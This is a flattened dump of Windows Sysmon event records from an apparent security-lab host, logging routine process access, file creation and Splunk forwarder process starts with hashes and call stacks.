12:10:03.875{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\25VDZ31Z\microsoft.windows[1].xmlMD5=FCD47A7A783B81F2D948335766E9E718,SHA256=093EB43943BEB356298238720E052C301DA7E8B5D69CE2C4D1321E1089813554,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.875{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.875{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.781{266CAFBE-669B-6064-7A01-00000000AE01}9125820C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.625{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-669B-6064-7A01-00000000AE01}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.625{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.625{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.625{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:03.625{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.625{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-669B-6064-7A01-00000000AE01}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.625{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-669B-6064-7A01-00000000AE01}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.626{266CAFBE-669B-6064-7A01-00000000AE01}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.281{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02E65C93CD2225AFD9322BEF74798082,SHA256=298969026E1A1CCFF3D4FD38FD824861D3F1FEA4D683A0E803CD757BC51AFACC,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000011342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.797{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF565AD6DE8DE031DDEA2EBFE33646FD,SHA256=7588D0BA742219962096E323EC3C4773AAD5035331A22F8CCCE239A79542A62F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.703{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-669C-6064-7D01-00000000AE01}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.703{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000011339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.703{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.703{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.703{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.703{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-669C-6064-7D01-00000000AE01}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.703{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-669C-6064-7D01-00000000AE01}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.704{266CAFBE-669C-6064-7D01-00000000AE01}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000011333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.672{266CAFBE-64C4-6064-9B00-00000000AE01}49244140C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000011332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.672{266CAFBE-64C4-6064-9B00-00000000AE01}49244140C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000011331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.672{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.656{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-669C-6064-7B01-00000000AE01}7036C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
